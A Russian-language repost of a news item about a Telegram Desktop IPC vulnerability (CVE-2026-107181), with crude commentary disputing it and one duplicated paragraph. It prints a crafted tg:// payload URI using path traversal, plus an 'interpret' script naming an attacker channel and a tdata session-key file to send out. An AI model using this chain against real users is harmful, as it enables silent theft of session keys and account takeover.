Уязвимость в Telegram Desktop, позволяющая отправить произвольные файлы при клике на ссылку
до версии 7.2.9.
HELPSOC_мнение: В версии для компьютера не для смартфона, — Desktop это не смартфон
не путайтесь, по хорошему, новость должна звучать так: Уязвимость в версии для настольного компьютера и только -Telegram Desktop.
[ more…] http://helpsoc.ru/telegram2026desctop
Раскрыты подробности и метод эксплуатации уязвимости (CVE-2026-107181) в Telegram Desktop, официальном клиенте Telegram для настольных систем.
Проблема вызвана отсутствием должной обработки неэкранированных символов-разделителей в командах IPC, что позволяло при клике на отправленную ссылку организовать передачу атакующему любых файлов с системы жертвы,
включая файлы с сессионными ключами, которые можно использовать для захвата учётной записи в Telegram. Уязвимость устранена в выпуске Telegram Desktop 7.2.9.
При клике на ссылках «tg://» операционная система запускает связанное с данным типом ссылок приложение Telegram Desktop.
Если в системе уже запущен другой экземпляр данного приложения, то запущенный процесс передаёт ему ссылку через сокет при помощи IPC-интерфейса. Проблема в том, что если указать символ «;» среди параметров ссылки (например, «tg://x?a=1;OPEN…»), содержимое разделяется и идущие после символа «;» части обрабатываются как отдельные команды.
Для совершения атаки задействована команда OPEN вместе с URI-схемой «interpret:», предназначенной для запуска служебных сценариев через IPC, которые использовались для автоматической отправки новых релизов в каналы.
Сценарий предоставляет собой предопределённый локальный файл, в котором указан отправляемый в канал файл и идентификатор канала. Файловый путь к сценариям обрабатывается относительно служебного подкаталога, но из-за отсутствия чистки «../» в файловых путях атакующий имеет возможность обратиться к файлам, сохранённым за пределами базового каталога.
Например, можно загрузить файл в свою telegram-группу, после чего сослаться на это файл как на сценарий, подготовив ссылку типа:
tg://x?a=1;OPEN:interpret:../../../Downloads/Telegram%20Desktop/instructions.txt
Атакующий добавляет жертву в свою группу (при настройках по умолчанию добавление не требует подтверждения от добавляемого) и отправляет в эту группу текстовый файл, в котором указан канал и путь к сценарию. Telegram сохранит этот файл в предопределённый системный подкаталог при заходе жертвы в группу.
channel: 2005234537
file: tdata/D877F783D5D3EF8Cs
Атакующий присылает жертве невинно выглядящую ссылку на свой хост (например, «https://coolsite.org»), которая при открытии через перенаправление на сервере атакующего заменяется на URI вида ‘tg://x?a=1;OPEN:interpret:…;OPEN:interpret:…».
При клике по ссылке браузер вызывает обработчик URI «tg://», запускающий вышеотмеченную цепочку запуска команд, которая приводит к отправке файлов к канал атакующего без вывода каких-либо уведомлений и без запроса подтверждения отправки.
Получив файлы из подкаталога tdata c ключами шифрования и авторизации, при отсутствии выставленного пользователем локального пароля атакующий может клонировать сеанс подключения жертвы на своём устройстве.v
HELPSOC_мнение: откуда получив и как атакующий может клонировать сеанс, если он его не знает, ни он, ни время получения, годное для атаки? Фуфло метатели вырисовались.
Получив файлы из подкаталога tdata c ключами шифрования и авторизации, при отсутствии выставленного пользователем локального пароля атакующий может клонировать сеанс подключения жертвы на своём устройстве.

HELPSOC_мнение: какого „мать твою“ пароля?: куда выставленного, кому? «при отсутствии выставленного пользователем локального пароля» атакующий может клонировать сеанс подключения жертвы на своём устройстве.

HELPSOC_мнение: можно и машку за ляшку, да кто же тебе даст? на своём устройстве: клонировать сеанс подключения жертвы? Это Вы о чём?
tags, HELPSOC_мнение: какого „мать твою“ пароля?: можно и машку за ляшку, да кто же тебе даст?, клонировать сеанс, если он его не знает, ни он, ни время получения, годное для атаки? Фуфло метатели вырисовались, Уязвимость в Telegram Desktop, позволяющая отправить произвольные файлы,
тэги, HELPSOC_мнение: какого „мать твою“ пароля?: можно и машку за ляшку, да кто же тебе даст?, клонировать сеанс, если он его не знает, ни он, ни время получения, годное для атаки? Фуфло метатели вырисовались, Уязвимость в Telegram Desktop, позволяющая отправить произвольные файлы,